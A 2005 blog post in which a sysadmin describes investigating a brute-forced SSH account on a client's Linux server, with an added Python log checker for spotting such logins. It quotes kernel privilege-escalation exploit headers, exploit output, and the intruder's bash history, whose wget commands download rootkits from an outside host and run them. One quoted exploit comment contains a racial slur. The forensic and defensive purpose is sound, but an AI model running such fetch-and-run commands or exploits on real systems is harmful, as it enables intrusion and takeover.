Archives for: November 2005, 03

11/03/05

Permalink 09:31:19 pm, Categories: Fun, 13 words   English (US)

Chinese way

I wonder what 1st person shooter that kid is playing in the background.

Permalink 09:00:44 pm, Categories: Linux, 611 words   English (US)

Hacked

So I'm logged into a client's Linux system and see a bunch of 'uselib24' processes run by a user 'tester' and taking up all the CPU. Immediately I knew it was hacked.

It turned out this 'tester' was a valid account with a very easy-to-guess password, and this is how they got in:

... tons of SSH attempts from 194.57.119.197
Nov 2 16:39:03 server sshd[13998]: Failed password for illegal user fax from 194.57.119.197 port 57895 ssh2
Nov 2 16:39:03 server sshd[14000]: Illegal user fax from 194.57.119.197
Nov 2 16:39:07 server sshd[14000]: Failed password for illegal user fax from 194.57.119.197 port 57995 ssh2
Nov 2 16:39:12 server sshd[14002]: Failed password for tester from 194.57.119.197 port 58116 ssh2
Nov 2 16:39:12 server sshd[14004]: Accepted password for tester from 194.57.119.197 port 58213 ssh2

Then later in the logs, tester comes in from a different IP:

Nov 2 20:41:42 server sshd[14574]: Accepted password for tester from 62.162.20.93 port 3132 ssh2
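The sequence in these excerpts (a run of failed passwords from one address, an accepted password from that same address, then the same account accepted from a new address) is exactly what a log monitor should flag. As an added example, not code from the original post, here is a small Python checker over constructed lines in the same sshd syslog format; the function name, alert labels and failure threshold are my own choices.

```python
import re
from collections import defaultdict

# Constructed sample input in the sshd format quoted in the post
# (addresses and PIDs copied from the excerpt above).
SAMPLE_LOG = """\
Nov 2 16:39:03 server sshd[13998]: Failed password for illegal user fax from 194.57.119.197 port 57895 ssh2
Nov 2 16:39:03 server sshd[14000]: Illegal user fax from 194.57.119.197
Nov 2 16:39:07 server sshd[14000]: Failed password for illegal user fax from 194.57.119.197 port 57995 ssh2
Nov 2 16:39:12 server sshd[14002]: Failed password for tester from 194.57.119.197 port 58116 ssh2
Nov 2 16:39:12 server sshd[14004]: Accepted password for tester from 194.57.119.197 port 58213 ssh2
Nov 2 20:41:42 server sshd[14574]: Accepted password for tester from 62.162.20.93 port 3132 ssh2
"""

# Matches both "Failed password for illegal user fax from ..." and
# "Accepted password for tester from ..."; the "Illegal user" line
# without "password for" is deliberately ignored.
AUTH_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:illegal user )?(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)"
)


def find_suspicious_logins(log_text, min_failures=3):
    """Return (alert, user, ip, failures_before) tuples for:
    - an accepted password that follows >= min_failures failed
      attempts from the same source IP (brute force that succeeded);
    - an accepted password for an account from an IP that account
      has not been accepted from earlier in the log (new source).
    """
    failures = defaultdict(int)   # ip -> failed attempts so far
    seen_ips = defaultdict(set)   # user -> ips already accepted
    alerts = []
    for line in log_text.splitlines():
        m = AUTH_RE.search(line)
        if not m:
            continue
        user, ip, result = m["user"], m["ip"], m["result"]
        if result == "Failed":
            failures[ip] += 1
            continue
        if failures[ip] >= min_failures:
            alerts.append(("brute_force_success", user, ip, failures[ip]))
        elif user in seen_ips and ip not in seen_ips[user]:
            alerts.append(("new_source_ip", user, ip, 0))
        seen_ips[user].add(ip)
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_logins(SAMPLE_LOG):
        print(alert)
```

On the sample above this reports the brute-forced 'tester' login from 194.57.119.197 after three failures, then the later 'tester' login from the previously unseen 62.162.20.93.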

So I check what processes this user is running. I see that he is running screen, and these 'uselib24' processes. Wondering where he ran these from, I just went to /proc/PID and looked at the cwd symlink. It's linked to /var/tmp/.a. I look in there and see all sorts of rootkit exploits, one of them being this uselib24. He even has the C code uselib24.c, and it looks like:

/*
* Linux kernel 2.4 uselib() privilege elevation exploit.
*
* original exploit source from http://isec.pl
* reference: http://isec.pl/vulnerabilities/isec-0021-uselib.txt
*
* I modified the Paul Starzetz's exploit, made it more possible
* to race successfully. The exploit still works only on 2.4 series.
* It should be also works on 2.4 SMP, but not easy.
*
* thx newbug.
*
* Tim Hsu Jan 2005.
....

Let's see, what else. There is a k-rad.c. What's that look like?

/*
* k-rad.c - linux 2.6.11 and below CPL 0 kernel exploit v2
* Discovered and exploit coded Jan 2005 by sd
*
* In memory of pwned.c (uselib)

And then ex_perl2b.c:

/*
* Copyright Kevin Finisterre
*
* Setuid perl PerlIO_Debug() overflow
*
* Tested on Debian 3.1 perl-suid 5.8.4-5
*
* (11:07:20) *corezion:* who is tha man with tha masta plan?
* (11:07:36) *corezion:* a nigga with a buffer overrun
* (11:07:39) *corezion:* heh
* (of course that is to the tune of http://www.azlyrics.com/lyrics/drdre/niggawittagun.html)
*
* cc -o ex_perl2 ex_perl2.c -std=c99
*
* kfinisterre@jdam:~$ ./ex_perl2
* Dirlen: 1052
* Charlie Murphy!!!@#@
* sh-2.05b# id
* uid=1000(kfinisterre) gid=1000(kfinisterre) euid=0(root)
*
*/

A nice collection of recent exploits. I honestly haven't been keeping up with Bugtraq. There are some other binaries with no source code. I'm able to actually 'screen -r' his session. It's running the uselib24 process, crunching away at trying to find a buffer overflow address. I wanted to use screen's scrollback buffer to get some history, but accidentally did a 'pkill -9 -u tester' in another window. So I only saw the last few things he did:

[tester@server .a]$ chmod 9x uselib24
chmod: invalid mode string: `9x'
[tester@server .a]$ chmod +x uselib24
[tester@server .a]$ ./uselib24

[+] SLAB cleanup
child 1 VMAs 29608
child 2 VMAs 1132
child 3 VMAs 124
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc0400000 - 0xc04f97de
Wait... /

~/.bash_history shows some more:

exit
w
uname -a
/sbin/ifconfig
iptables -L
cd /var/tmp
mkdir -p .a
cd .a
wget radovis.com/images/new.tgz
tar zxvf new.tgz
chmod +x hator
wget radovis.com/images/k.zip
unzip k
chmod +x hator
./hator
chmod +x pwned
./pwned
chmod +x a
./a
chmod +x modprobe
./modprobe
./pwned
./a
screen -v
ps -x
ps -aux
screen -v
screen
screen -r
ls -al
chmod 9x uselib24
chmod +x uselib24

So you see he downloaded rootkits from http://www.radovis.com/images/.

Doesn't appear he was able to get root access. Luckily this server is being phased out anyway. Wee, the fun of finding hackers... yawn.

Viraj's Weblog
